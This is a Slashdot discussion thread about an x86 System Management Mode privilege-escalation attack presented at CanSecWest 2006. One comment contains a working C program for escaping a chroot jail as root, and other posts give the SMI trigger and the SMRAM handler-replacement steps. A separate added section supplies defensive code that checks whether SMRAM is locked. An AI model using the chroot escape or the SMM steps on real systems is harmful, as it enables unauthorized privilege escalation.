Pentium Computers Vulnerable to Attack?
An anonymous reader writes "One of the latest security scares is coming from security experts at CanSecWest/core '06 in the form of a possible hardware-specific attack. The attack is based on the built-in procedure that Pentium based chips use when they overheat. From the article: 'When the processor begins to overheat or encounters other conditions that could threaten the motherboard, the computer interrupts its normal operation, momentarily freezes and stores its activity, said Loïc Duflot, a computer security specialist for the French government's Secretary General for National Defense information technology laboratory. Cyberattackers can take over a computer by appropriating that safeguard to make the machine interrupt operations and enter System Management Mode, Duflot said. Attackers then enter the System Management RAM and replace the default emergency-response software with custom software that, when run, will give them full administrative privileges.'"
the sky is falling (Score:5, Funny)
Re:the sky is falling (Score:2)
It's a frustrating article (Score:4, Interesting)
The presentation lists events that will trigger a System Management Interrupt (SMI) and enter System Management Mode (SMM). Overheating is only one of them. Another is "century rollover". Taken literally, that would mean that anyone who could set the clock to 11:59 December 31 1999 [I'd say 2000 but I doubt the chip is mathematically correct] can enter SMM without needing physical access to the machine or to the circuit breaker for the air conditioning. Or to use the presentation's example, outl(0xB2, 0x0000000F);.
If I read this problem report [monkey.org] correctly, then a process outside of SMM can write to the memory for SMM. (Controlled by the D_OPEN bit in the SMM control register).
So it looks like you can do it without physical access, where "it" is a privilege escalation that *starts* from root. That's getting less absurd all the time as virtualization and technologies like SELinux become more common. Also allows planting a deeper-than-root rootkit. You could escalate to God of Hardware or in the CanSecWest example to "root at securelevel -1".
Maybe I should email Duflot for details and write up something for my nerdish security blog [berylliumsphere.com]
Aren't you already screwed? (Score:5, Interesting)
Re:Aren't you already screwed? (Score:3, Informative)
Re:Aren't you already screwed? (Score:5, Funny)
Re:Aren't you already screwed? (Score:3, Insightful)
1. They don't NEED to do any of it because they already own your box
2. The system designers really fucked the pooch good on the security design of these components
Come on, even Windows knows that not just any Joe User should be able to reprogram the CPU interrupts...
Re:Aren't you already screwed? (Score:2, Insightful)
Re:Aren't you already screwed? (Score:2)
Re:Aren't you already screwed? (Score:2)
if you've got p4's installed in the machine, there's no need to fake anything, it's already in the package.
aside from joking, badly written software that puts way too much pressure on the cpu can overheat a badly ventilated machine. in some countries you just have to synchronize your attack with the weather conditions (over here it pops over 40C in the summer, a bit of load on the machine and it will overheat by itself, no torch needed).
and eventually there's no ultima
Re:Aren't you already screwed? (Score:2)
Re:Aren't you already screwed? (Score:3, Informative)
Think like an evil hax0r, then be afraid. (Score:5, Interesting)
> be used for is bypassing secure levels inside of OpenBSD, where you already have root.
People, think this through a bit and some more dangers appear. If root can replace System Management Mode there are some interesting possibilities for evil. SMM runs at permission levels beyond ring0, think of it as ring-1. From there you can escape any virtualization, any chroot jail, probably even escape from inside an emulator like VMWare if you can manage to execute the exploit without the emulation catching it and simulating it. Until this is completely understood and fixed, Xen, usermode linux, chroot and possibly VMWare/VirtualPC should be suspect.
Now imagine just how many people have root access to their virtual server at a hosting company and how many other users are running on the same physical hardware secure in the belief that their customer information is safe. But is it?
Re:Think like an evil hax0r, then be afraid. (Score:2)
chroot is *not* secure if attacker has root (Score:2)
If you've got root in a chroot "jail", you already own the machine. To break out of jail, just use a program such as the following (... and pass it a subdirectory within the "jail" as argument):
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* usage: breakout <subdir inside the jail> <program to run>; must be root */
int main(int argc, char **argv)
{
    int i;
    if (argc < 3) { fprintf(stderr, "Bad argument count\n"); exit(1); }
    /* chroot() without chdir(): the cwd is left outside the new root */
    if (chroot(argv[1])) { perror("chroot"); exit(1); }
    for (i = 0; i < 1024; i++) chdir("..");  /* climb to the real root; ".." at / is a no-op */
    chroot(".");                              /* re-root at the real filesystem root */
    execl(argv[2], argv[2], (char *)NULL);    /* run a program outside the jail */
    perror("execl");
    return 1;
}
Re:Think like an evil hax0r, then be afraid. (Score:3, Insightful)
So does anything that can load before your kernel. (Like a boot sector virus.)
Now imagine just how many people have root access to their virtual server at a hosting company and how many other users are running on the same physical hardware secure in the belief that their customer information is safe. But is it?
This isn't really different than a boot sector. If you have root on a VIRTUAL server, you shouldn't have access to this or to the
Re:Think like an evil hax0r, then be afraid. (Score:3, Informative)
> the "real" OS)?
If it is a P-IV in a 1U rack I'd suspect all you would have to do would be chew CPU cycles like mad for an hour. It isn't that hard, most of the first batch of P-IV chips ran so hot they will only run at their rated speed for a few minutes without some serious aftermarket cooling solutions. So there are potentially a couple million machines out there which are especially vulnerable.
Re:Aren't you already screwed? (Score:2)
What about MMUs (Score:2, Informative)
Physical access (Score:4, Insightful)
Move along, folks.
Re:Physical access (Score:2)
"Physical access" is one of the reasons why wireless will never - well, not anytime soon, anyway - be fully secure.
Re:Physical access (Score:2)
Would you elaborate on that? I'm trying to understand the link between "Physical access" and "wireless".
I'm hoping that setting up an OpenBSD machine (sparc64) to be an AP where only authorized people who log into it through ssh are allowed access through it with authpf and then only IPSEC traffic, might be able to provide decent security.
Technically, you are correct. (Score:3, Interesting)
Having said that, I believe B3 security mandates that memory and other system resources have mandatory access controls for precisely this sort of reason - a user who already has sy
Re:Technically, you are correct. (Score:2)
Re:Physical access (Score:2)
The twist: the virus can set the overheat temp very low, so it's easy to trigger via the virus,
and the virus also does something akin to a bios flash that uploads a custom bios
instead of just nuking the bios like cmos death did
Its kinda like the firmware vulnerabilities that were present in some cheap routers
and in cisco's case not so cheap
it can be done remotely
Ex-M
Sensational headline about a poor article. (Score:5, Informative)
Re:Sensational headline about a poor article. (Score:5, Interesting)
FCW stands for Federal Computer Week, a trade rag that US gov't stooges use to figure out how to best waste our tax dollars on shiny boxes with blinky lights. Their topic headings include the buzzwords:
The anonymous submitter might do well to remain so. Scuttlemonkey, OTOH, may have to enter the witness protection program. He's getting as bad as Zonk.
RAM access? (Score:3, Insightful)
How is it that an unprivileged user can write to such a sensitive location in the first place?
Security Experts Untie! (Score:5, Funny)
Good Times (Score:5, Funny)
Then a few years later, Microsoft brought us Outlook with automatic attachment opening, making the first part possible, and now Intel has given us the potential for the second part.
Good Times apparently wasn't a hoax, it was just ahead of its times.
Re:Good Times (Score:2)
I think Commodore beat everyone up in terms of being ahead of time...try 1977! [6502.org]
Re:Good Times (Score:2)
Well, "hardware attacks" existed before too. There were some that would send your screen a refresh rate it couldn't handle, and it'd be destroyed (this is back in the text-mode days). Of newer things, some viruses would overwrite the BIOS, which I believe required reflashing in laptops which didn't have a ROM copy to reset to. Th
Re:Good Times (Score:5, Insightful)
The watershed for me, will always be the IE image exploits, where a malicious website could run code, simply by your browser attempting to download a carefully crafted image file.
There I was, for years, telling people; "There's no way you can get a virus by just looking at a picture on the internet". Boy was I wrong.
Bottom line, no matter what you pronounce impossible through software, invariably, somewhere out there, there exists a bug to accomplish just that.
Headbanger Virus (Score:3, Informative)
It was also based a little in reality - CPUburn could theoretically destroy an improperly heat-sinked
Re:Headbanger Virus (Score:2)
There was one that overwrote the park command so it didn't actually park the heads.
There was an Apple Virus for the APPLE IIc(I think, maybe an earlier model) that changed where the heads read the disk. This trick was also a great way to hide data.
There have been a couple PC viruses that wrote to 13. Another that overwrote the MBR.
Now they are just inconvenient.
Re:Headbanger Virus (Score:2)
I looked into the possibility of using "dead space" (space left at the end of programs and other fixed-length files that canNOT be used by anything else), because when you load a program, you actually load complete sectors. It would have been easy to attach something to the disk int
Sensationalist (Score:5, Funny)
Along a similar vein, I have developed a martial art where I can kill anyone in one blow. It requires that my opponent is already tied-up, asleep, and I have a gun.
In other news... (Score:5, Funny)
Seriously, if they have access then you are screwed anyways...
- Andrew
Heh (Score:2)
Not being a retard still work, though? Right? (Score:4, Insightful)
Re:Not being a retard still work, though? Right? (Score:2)
If by firewall, you mean one made of masonry or asbestos, yes.
How do you even get it to overheat to begin with? (Score:2)
I heard, act of God includes "stupidity".
Re:How do you even get it to overheat to begin wit (Score:2)
Re:How do you even get it to overheat to begin wit (Score:2)
Re:How do you even get it to overheat to begin wit (Score:2)
Well I generally like to compliment it on how pretty its power-on indicator is.
Then I might buy it something small, superfluous and pretty like a tennis bracelet or an X800 Radeon.
After that I start gently caressing its biometric module.
That generally gets it pretty hot...
The devil is in the details (Score:5, Insightful)
- The article states that all x86 processors "could" be vulnerable. Does that mean the *entire* series of Pentium chips, even the older PIII and PII's? If so, are they equally as easy to compromise as the modern versions?
- There is no mention of AMD architecture. Doesn't AMD have an equivalent "overheat failsafe" halt-and-cooldown function? Wouldn't that make AMDs vulnerable to this type of exploit as well, or do they require a slightly different attack?
- Isn't the motherboard BIOS FlashROM responsible for the monitoring of and responding to dangerous CPU temperatures? Haven't they already been safeguarded against unauthorized writes, due to the Chernobyl virus?
I think I'll hold off on ordering the prototype Borg implants when they come on the market....
Not Very Long Lived... (Score:2)
Re:Not Very Long Lived... (Score:2)
What Microsoft said... (paraphrased) (Score:2)
Good thing macs aren't vulnerable. (Score:5, Funny)
A few more details (Score:5, Informative)
Re:A few more details (Score:5, Informative)
Linux and *BSD have a /dev/mem device interface for accessing physical memory from user space. Usually, this device only allows access from a privileged user:
Using /dev/mem, it should be possible to access the address range assigned to system management RAM. However, the CPU has a Model-Specific Register (MSR) for enabling and disabling accesses to SM RAM. The instructions that are used to read and write MSRs (RDMSR and WRMSR) must be executed from ring-0 (kernel level) or else a GPF occurs. However, the Linux kernel can be configured to provide a user level interface to MSRs via:
Again, you'll probably need root privileges to access the device.
Re:A few more details (Score:2)
Who says the system management ram is accessible by MSRs?
Seems like there isn't enough on-die space to save the entire state of the O/S, and MSR writing is painfully slow, so it wouldn't have time to dump everything INSIDE the core before triggering thermal protection.
More details? Anyone? Anyone?
exploit schmexploit (Score:2)
I ran it, and now my computer is "resting" for a few days.
Take that Loic Duflot
(if you want the link, just let me know, and when I boot up my new 6, I'll send it to you)
--
I just put some lightnin' in my Dell
Semi Permanent Backdoor? (Score:3, Insightful)
Or am I confused?
A "1" (Score:2)
Sure it is probably possible, but then I suppose it would be possible to retrofit my truck into a boat. Heck, it would probably be easier and faster to do that than it would be to
UNIVAC had similar vulnerability in checkpoint (Score:4, Interesting)
The crack:
1. Checkpoint your job to tape.
2. remount tape.
3. fiddle the executive-mode bit in the dumped status register.
4. remount tape.
5. restart job -- mainframe p0wn3d.
Of course, in those days, a student that could do that was quickly hired into the system programming staff so that they could keep a closer eye on him and also get some productive work from him.
Ohh... BTW... if you can find an 1100/10 these days, it won't work any more. They fixed that about the same time they quit making CPU's out of vacuum tubes.
I wish Intel would create new bugs, instead of just repeating old ones. Copycats.
Just think, the script kiddies that pulled this off are now drawing Social Security.
I'm Safe (Score:2, Funny)
Not only do you receive a convenient olfactory signal to alert you to the situation, but you also avoid security breaches brought on by overly complex thermal management.
i heard about this! (Score:2)
Recommended work around (Score:2)
All Pentiums also vulnerable to DoS (Score:5, Funny)
Pentium based machines are also vulnerable to a denial of service attack from a hacker with physical access to the machine and in the possession of a large axe. Should the attacker be wielding a pair of axes (one in each hand) then the attack would constitute a distributed denial of service.
Next James Bon movie script excerpt: (Score:2)
evil hacker spotted... (Score:2)
film at 11
Better article: no FUD-OpenBSD demo-Theo comment (Score:4, Informative)
cansecwest/core06: "security issues related to Pentium SMM"
Loic Duflot
Title: Security Issues Related to Pentium System Mgmt Mode
It is day 2 at Cansecwest and this talk wins for 'so frightening that you want to hide under your desk in the fetal position'.
I'll go through the high level technical and then end with pointing out a principle that is one of those universal truths I carry around with me everywhere.
This entire exploit is based on documented x86 functions.
Your CPU runs in a few modes, one of those modes is known as Protected mode, the other known as System Mgmt Mode. When your OS is running, you're in Protected mode and this is how much of the security is performed and you'll hear of ring0 and ring3. Just know that your in-world universe is in protected mode.
System Management Mode (SMM) is used so that when there is something external to your OS world like say a thermal condition that needs to communicate some message, the CPU saves all its protected mode state out, does all this SMM stuff and then return to its regular scheduled program in protected mode.
There are details that involve register addresses and very low level operations but for the most part, a system in a very secure state can be circumvented via this SMM facility. I'm talking free access to all memory and IO.
The song goes a little like this:
Enable SMI
Open SMRAM space
Replace default SMI Handler by custom one (do your duty)
Close SMRAM space
Trigger SMI
Gain access to restricted operations.
In the wider picture: works on most systems. Turns out that Linux and the *BSD's will fall victim to this attack strategy, however, Windows XP is not known to be exploitable because of a few system calls that are not present and more importantly a certain memory range in protected mode is not shared addresses to SMM.
So, for the demo, they did not pick some shabby OS to exploit. How about OpenBSD at level2 (high security) with allowaperture=1
Ummm...it worked. Theo, microphone please?
Theo spoke to this OPENBSD issue and said he and the team have known about it for a year. They are between a rock and a hard place because Xserver is really the core of the problem. It has too much damn access to registers and is in the most unfortunate address space in protected mode because when in SMM, what is in that address range can be used to exploit.
Solution is for Xserver people to abstract sufficiently so that the kernel can have more governance on the Xservers logic.
Closing TK comments:
A system or a world that has a policy governed by in-world mechanisms cannot be effective when a process in-world can reach to the out-world to cause in-world change. You could also say that since a problem cannot be resolved at the same logical realm it has been created, then it is also the case that the most effective governance of a world can only come from outside that world. Think about all the crazy things we do in the physical world. As soon as we could get to the strong and weak forces at the atomic level, we created an incredibly destructive device. I just hope that if string theory is right and there really are energy strings at the lowest level of the universe, that no one in our world gets control of them. The negative outcome caused by the power hungry is too high a risk to even consider the positive benefits.
It's late and I have been blogging way too much today; I am certain that my mental packet loss is abnormally high. I'll return to this in-game out-game concepts later in another blog entry, when I am less sleep deprived.
--tk
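An added example, not code from Duflot's talk, from the CanSecWest slides or from OpenBSD, serving both the D_OPEN remark in the "It's a frustrating article" post above and the five-step sequence in this one. Step 2 ("open SMRAM space") is a write to the memory controller's SMRAMC register that sets D_OPEN; the check a practitioner wants is whether firmware set the D_LCK bit before handing off to the OS, because once D_LCK is set D_OPEN is read-only until reset and the handler cannot be replaced from ring 0 this way. The code decodes the register, models the locked/unlocked write semantics, and on a Linux host reads the live value through sysfs. Assumptions not stated on the page: the bit layout below is Intel's documented SMRAMC layout for the 440BX (config offset 0x72) and the 9xx-series north bridges (config offset 0x9D), both on PCI device 00:00.0; other chipsets differ, and the sysfs path is Linux-specific.

```c
/*
 * Added example: decode the Intel SMRAMC register and report whether the
 * SMI handler in SMRAM is, or can be made, writable from ring 0.
 * ASSUMPTIONS: bit layout as documented for Intel 440BX (offset 0x72) and
 * 9xx-series memory controllers (offset 0x9D) on PCI device 00:00.0.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define SMRAMC_D_OPEN     (1u << 6) /* SMRAM readable/writable outside SMM     */
#define SMRAMC_D_CLS      (1u << 5) /* data accesses in SMM go to VGA instead  */
#define SMRAMC_D_LCK      (1u << 4) /* lock: D_OPEN/D_CLS/G_SMRAME read-only   */
#define SMRAMC_G_SMRAME   (1u << 3) /* SMRAM enabled at all                    */
#define SMRAMC_C_BASE_SEG 0x07u     /* 010b = SMRAM decoded at A0000h-BFFFFh   */

struct smramc {
    int enabled, open, closed, locked;
    unsigned base_seg;
};

/* Decode the raw SMRAMC byte into its fields. */
struct smramc smramc_decode(uint8_t reg)
{
    struct smramc s;
    s.enabled  = !!(reg & SMRAMC_G_SMRAME);
    s.open     = !!(reg & SMRAMC_D_OPEN);
    s.closed   = !!(reg & SMRAMC_D_CLS);
    s.locked   = !!(reg & SMRAMC_D_LCK);
    s.base_seg = reg & SMRAMC_C_BASE_SEG;
    return s;
}

/*
 * Model of the attack's "open SMRAM space" write: once D_LCK is set the
 * hardware ignores writes to D_OPEN until the next reset.  Returns the
 * register value after the attempted write.
 */
uint8_t smramc_after_set_d_open(uint8_t reg)
{
    if (reg & SMRAMC_D_LCK)
        return reg;                 /* locked: the write is silently dropped */
    return reg | SMRAMC_D_OPEN;     /* unlocked: SMRAM now visible to ring 0 */
}

/*
 * Can ring 0 (root via /dev/mem, a kernel module, X with allowaperture)
 * overwrite the SMI handler?  Yes if SMRAM is already open, or is unlocked
 * and therefore can be opened.
 */
int smram_writable_from_ring0(uint8_t reg)
{
    struct smramc s = smramc_decode(reg);
    return s.open || !s.locked;
}

/* Read one byte of PCI config space through sysfs; -1 if unreadable
 * (non-root users only see the first 64 bytes on Linux). */
int smramc_read_sysfs(const char *path, long offset)
{
    FILE *f = fopen(path, "rb");
    int byte;
    if (!f)
        return -1;
    if (fseek(f, offset, SEEK_SET) != 0 || (byte = fgetc(f)) == EOF) {
        fclose(f);
        return -1;
    }
    fclose(f);
    return byte;
}

int main(int argc, char **argv)
{
    /* Default offset assumes a 9xx-series north bridge; pass 0x72 for 440BX. */
    const char *path = "/sys/bus/pci/devices/0000:00:00.0/config";
    long offset = argc > 1 ? strtol(argv[1], NULL, 0) : 0x9D;
    int raw = smramc_read_sysfs(path, offset);
    struct smramc s;

    if (raw < 0) {
        fprintf(stderr, "cannot read %s at offset 0x%lx (need root; Intel only)\n",
                path, offset);
        return 2;
    }
    s = smramc_decode((uint8_t)raw);
    printf("SMRAMC=0x%02x: enabled=%d open=%d closed=%d locked=%d base_seg=%u\n",
           raw, s.enabled, s.open, s.closed, s.locked, s.base_seg);
    printf("SMI handler %s overwritable from ring 0\n",
           smram_writable_from_ring0((uint8_t)raw) ? "IS" : "is NOT");
    return smram_writable_from_ring0((uint8_t)raw) ? 1 : 0;
}
```

Run it as root; exit status 1 means the firmware left SMRAM unlocked (the precondition for the sequence above), 0 means D_LCK is set and the handler is not reachable this way, 2 means the register could not be read. The decode and write-model functions are pure so the verdict logic can be checked without hardware.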
Not really an exploit (Score:3, Insightful)
By the way, whenever the CPU does a memory read or write while in SMM, it asserts the SMM# pin. This means that
Too much hassle (Score:2)
Works just as fine.
reminds me attacking VM's via physical memory... (Score:2)
Yea, it was
This guy shouldn't be allowed to write... (Score:2)
Where to begin.
First off, none of the low-power states C0->C4 stash to a system management RAM (yet). Second, the lower Cx states flush the cache, but they don't flush in response to heat, in that case they perform a Geyserville transaction which lowers frequency and voltage. Only if you exceed the thermal diode does it go tits-up. Now there's word it may save state in future Cx states, but I sincerely doubt anyone would be able to get inside the on-die ram, since it will sit beh
Concern (Score:2)
However, if you attack the driver of a secure card at the same time as you are thermally stressing it, you may be able to take it over, extracting the key data without triggering the tamper evident seals.
Fortunately, security cards that I am familiar with do NOT use Intel
Re:FUD? (Score:2)
Re:FUD? (Score:5, Insightful)
When the processor begins to overheat or encounters other conditions that could threaten the motherboard, the computer interrupts its normal operation, momentarily freezes and stores its activity,
Ok, fine.
Every computer that runs on x86 chip architecture may be vulnerable to this attack
Wait. How did we get here?
Let's go through this, again. Intel Pentium 4s are hot. No surprise there. They enter special modes when overheating that may introduce a security vulnerability. Fine. How does this cross over to AMD and Via chips again? AMD and Via processors don't have special modes like that. If system heat becomes critical they will simply shut the system down flat out. On a Pentium 4, overheating is not entirely unexpected, particularly on the high edge of the clock speeds. On an AMD or Via, overheating is a major failure condition, probably caused by a heatsink falling off.
So, how are all x86 chips vulnerable, exactly? (Incidentally, between this and this [daemonology.net], AMD is really looking to be a much safer deal, not to mention faster, cooler, more power efficient, etc.)
Re:FUD? (Score:3, Informative)
You are a little off. What a P4 does is "speed stepping" where if it is overheating it will down the clock and avoid areas on the chip that are the hottest, if it gets too hot it will shut down completely. This is desi
Re:FUD? (Score:2)
Yeah, because heatsinks coming unlatched all by themselves and falling off has been shown to be a common occurrence.
Re:FUD? (Score:3, Interesting)
It happened to my wife's computer. The case is behind her desk, so I'm pretty sure nobody was picking it up and dropping it. One day it started spontaneously turning off after only a few minutes of use. After a little frustration at not even being able to complete any diagnostics on my CD, I finally pulled the desk out and opened the case up. I found the heatsink hanging from one peg, and the
Re:FUD? (Score:2)
Years ago I scored myself an Athlon 700 which was thrown out. When I got it home, guess what... heatsink had become unlatched and fell off enough to lose contact with the CPU. I fixed the dodgy latch hooks and it's been great for the past 4 years or so.
The person who threw it out was probably fed up with the few minutes of uptime they could get. ; )
Re:FUD? (Score:2)
Re:FUD? (Score:3, Informative)
AMD added this feature in the Athlon XP (maybe not th
Re:FUD? (Score:2)
Re: (Score:2)
Re:FYI (Score:2)
Are you sure it was motherboard makers and not Microsoft with Windows?
Re:FUD? (Score:2)
Re:FUD? (Score:2)
So every now and then the CPU fan would crap. This was only an AMD K6-2 500Mhz chip but when that baby got hot, Windows 2K would BSOD like crazy. That was my cue to go out and buy another fan for $5.00. Hey, they lasted a year or so each so no big deal.
So that's how AMD chips respond to overheat, at least in my experience.
Re:FUD? (Score:2)
It dumps heat quite well. And I do have a job, very nice one in fact. And the ad hominem attack wasn't very nice. I'm going to have to tell your momma.
AMD overheat (Score:2)
As a longtime AMD and VIA user, I would call bullshit on that. With VIA, certainly (my Epias are rather low power, lower heat), but most of my AMD's have run rather hot-ish
K6-2/400 - Same as P-II
"Thunderbird" 700Mhz - Not hot, but no cooler than the same-gen Pentiums.
Duron 1Ghz - Power-hungry and hot enough to raise the room temperature noticeably when run in a server
Athlon XP 2500+ - Holy-freakin' he
Re:FUD? (Score:2)
FUD? Judge for yourself. (Score:2)
So, here's a link to the actual PowerPoint presentation [cansecwest.com]. Don't just click on it without reading the caveats below.
He has a sample exploit there on an OpenBSD system.
Here's the guy's bio from the talk:
Loïc Duflot
Security Issues related to Pentium System Management Mode
Loïc Duflot is a security enginee
Re:FUD? (Score:2)
Naw, AMD chips don't enter hardware interrupt mode when they overheat, they violently explode: http://www.azfar.name.my/2005/02/amd-duron-explode.php [azfar.name.my].
Re:Isn't it about time (Score:2)
Fear the consequences of creating Pentium chips? I'm no fan of Intel, myself, but that seems a bit extreme.
Re:Isn't it about time (Score:2)
parent is obviously scared by computers and computer crime. news flash, all computers have some sort of security problem. you can't lock people up and think that will solve all the computer security problems so you can sleep well at night. people who are clueless about computers advocate such hard line policies. it's ignorance and fear and wanting to do something -anything- no matter how completely irrelevant and meaningless that action is.
Re:Isn't it about time (Score:2)
Also, many of the people doing these things are stupid kids. Come on, $25 for a 10,000 node botnet? That's someone who wants money to play whatever online game is hot these days, not someone
Re:Isn't it about time (Score:2)
Re:Isn't it about time (Score:2)
Re:Isn't it about time (Score:2)
"No sprinkles. For every sprinkle I find, I shall kill you."
Re:Remember the F00F bug? (Score:2)
Uh, no (Score:2)
Re:But how? (Score:2, Interesting)
SMM is present on many x86 processors and dates back to the days of NeXGen and Cyrix and 486s. It is basically a real-like mode of the x86 processor where certain hardware emulation type operations are performed.
The SMM software usually resides at A000:0000 which is normally video memory in a PC. However, in SMM the address decoder actually maps those addresses to physical RAM and runs the SMM k
Re:I think Im covered (Score:2)
Re:Wait wait wait (Score:3, Interesting)
Come to think of it, I had an old HP that integrated a fan controller on the motherboard. It might have been hardware-only, though.
Seems like a lot of hacking for a small payoff, but I think the path is there for some systems.
Re:Wait wait wait (Score:2)
It's possible to kill the daemon or boot up without launching it, but in the event of this, the hardware has a "fail s
ummm (Score:2)